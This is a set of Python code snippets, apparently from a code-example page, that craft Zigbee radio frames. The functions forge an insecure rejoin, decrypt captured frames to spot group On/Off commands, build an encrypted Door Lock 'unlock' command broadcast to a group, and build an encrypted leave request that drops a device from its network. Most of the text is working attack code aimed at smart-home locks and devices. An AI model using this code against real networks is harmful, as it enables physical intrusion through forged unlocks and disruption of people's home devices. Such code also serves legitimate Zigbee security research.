def insecure_rejoin(source,
                    destination,
                    pan_id,
                    extended_source,
                    seq_num=0,
                    nwk_seq_num=0):

    extended_source = extended_address(extended_source)
    source = address(source)
    destination = address(destination)
    pan_id = pan(pan_id)

    dot15d4_data = dot15d4_data_stub(seq_num, pan_id, source, destination)

    nwk = ZigbeeNWK()
    nwk.frametype = 1
    nwk.proto_version = 2
    nwk.flags = ['extended_src']
    nwk.ext_src = extended_source
    nwk.source = source
    nwk.radius = 30
    nwk.seqnum = nwk_seq_num

    nwk_command = ZigbeeNWKCommandPayload()
    nwk_command.cmd_identifier = 6
    nwk_command.allocate_address = 1

    return dot15d4_data / nwk / nwk_command
def is_on_off_frame(f):
    # this is needed later for the decryption and encryption
    extended_source = extended_address(f[ZigbeeSecurityHeader].source)

    # decrypt the packet
    p = crypto_utils.zigbee_packet_decrypt(args.key, f, extended_source)

    # delivery mode: Group, frametype: Data, profile: Home Automation, Cluster: On/Off
    result = (p[ZigbeeAppDataPayload].delivery_mode == 3
              and p[ZigbeeAppDataPayload].aps_frametype == 0
              and p[ZigbeeAppDataPayload].profile == 0x0104
              and p[ZigbeeAppDataPayload].cluster == 0x0006)
    return result
예제 #3
0
def encrypted_unlock(panid,
                     source,
                     destination,
                     extended_source,
                     key,
                     frame_counter=0,
                     seq_num=0,
                     nwk_seq_num=0,
                     aps_counter=0,
                     zcl_seq_num=0):

    panid = pan(panid)
    source = address(source)
    destination = address(destination)
    extended_source = extended_address(extended_source)

    extended_source_bytes = extended_address_bytes(extended_source)

    aps_payload = ZigbeeAppDataPayload()
    aps_payload.aps_frametype = 0
    aps_payload.delivery_mode = 3
    aps_payload.frame_control = 4
    aps_payload.cluster = 0x0101
    aps_payload.profile = 0x0104
    aps_payload.group_addr = 0x0005

    aps_payload.dst_endpoint = 0xff  # Broadcast
    aps_payload.src_endpoint = 1
    aps_payload.counter = aps_counter

    zcl = ZigbeeClusterLibrary()
    zcl.zcl_frametype = 1
    zcl.transaction_sequence = zcl_seq_num
    zcl.command_identifier = 1

    payload = aps_payload / zcl

    dot15d4_data = dot15d4_data_stub(seq_num, panid, source, destination)
    nwk = nwk_stub(source, destination, nwk_seq_num)
    security_header = security_header_stub(extended_source, frame_counter)
    unencrypted_frame_part = dot15d4_data / nwk / security_header

    return crypto_utils.zigbee_packet_encrypt(key, unencrypted_frame_part,
                                              bytes(payload),
                                              extended_source_bytes)
예제 #4
0
def encrypted_leave_req(panid,
                        source,
                        destination,
                        extended_source,
                        key,
                        frame_counter=0,
                        seq_num=0,
                        nwk_seq_num=0,
                        aps_counter=0,
                        zcl_seq_num=0):

    panid = pan(panid)
    source = address(source)
    destination = address(destination)
    extended_source = extended_address(extended_source)

    extended_source_bytes = extended_address_bytes(extended_source)

    aps_payload = ZigbeeAppDataPayload()
    aps_payload.frame_control = 4
    aps_payload.delivery_mode = 0
    aps_payload.aps_frametype = 0
    aps_payload.dst_endpoint = 0
    aps_payload.cluster = 0x0034
    aps_payload.profile = 0x0000
    aps_payload.src_endpoint = 0
    aps_payload.counter = aps_counter

    zdp = ZigbeeDeviceProfile()
    zdp.sequence_number = zcl_seq_num
    zdp.extended_address = 0
    zdp.remove_children = 0
    zdp.rejoin = 0

    payload = aps_payload / zdp

    dot15d4_data = dot15d4_data_stub(seq_num, panid, source, destination)
    nwk = nwk_stub(source, destination, nwk_seq_num)
    security_header = security_header_stub(extended_source, frame_counter)
    unencrypted_frame_part = dot15d4_data / nwk / security_header

    return crypto_utils.zigbee_packet_encrypt(key, unencrypted_frame_part,
                                              bytes(payload),
                                              extended_source_bytes)